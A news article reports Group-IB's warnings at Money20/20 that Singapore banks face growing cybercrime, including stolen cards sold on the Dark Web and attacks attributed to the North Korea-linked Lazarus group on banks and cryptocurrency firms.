Having the biggest economy in Southeast Asia, Singapore has become a favorite target when it comes to cybercrimes and data breaches. In the Money20/20, an annual event held focusing on financial technologies and financial services, the agenda of cybercrime prevention was highlighted. Threat Intelligence firm, Group-IB emphasized in the summit the exposure Singapore banks are facing, and it is set to only grow year-by-year. A more particular case of rampant selling of stolen bank cards (approximately 19,928), originally issued by Singapore-based banks that were sold through the Dark Web in 2018.
Group-IB is also accusing the infamous Lazarus group, the North-Korean sponsored underground hacking team operating in Southeast Asia. They claim that Lazarus was behind the RATv3.ps trojan attack (Remote Administration Tool), which allegedly is being used for cyber espionage for at least three years now. The same group is also linked with the Ratankba trojan which was infecting visitors of the website it silently takes control.
Lazarus group have unknown members, no one has provided information of their actual whereabouts or what will be their next campaign. The North Korean government has also for quite sometime denied any allegation that they are funding a hacker group of their own. However, one thing is for sure, the Lazarus group initiates well funded campaigns, as it takes a lot of funding in order to develop malware, produce hacking procedures and discover vulnerabilities of their target victims.
“So in case of Lazarus, a stitch in time saves nine. It is very hard to contain their attacks as they happen. You have to be well prepared and know their tactics, and tools. In particular, it is extremely important to have most up-to-date indicators of compromise, unavailable publicly, that can only be gathered through automated machine learning-powered threat hunting solutions. Given the group’s increased activity in the region in 2018, we believe that Lazarus will continue to carry out attacks against banks, which will result in illicit SWIFT payments, and will likely experiment with, primarily focusing on Asia and the Pacific,” explained Dmitri Volkov, Group-IB’s Head of Threat Intelligence team.
Lazarus team is expert when it comes to cyber espionage, as they have advanced command line tools at their disposal that are internally developed. Their expertise is with injecting malicious codes on websites, which means any poorly maintained browser visiting those same websites will be infected by a trojan which is capable of monitoring the computers through deep probing.
“According to Group-IB Hi-Tech Crime Trends report 2018, Lazarus — unlike most of other state-sponsored threat actors — does not shy away from attacking crypto. Singapore, being one of the most crypto-friendly countries in the world, attracts not only thousands of crypto and blockchain entrepreneurs every year, but also threat actors willing to grab a piece of the pie. We expect that other APTs like Silence, MoneyTaker, and Cobalt will stage multiple attacks on cryptocurrency exchanges in the near future,” added Volkov.
System administrators and everyone in the IT industry is cautioned with their common habit of deferring program and operating system updates, under the guise of “if it is not broke, don’t fix it” principle. This principle is very dangerous and risky for any corporate environment, which was one of the takeaways in the Money20/20 summit.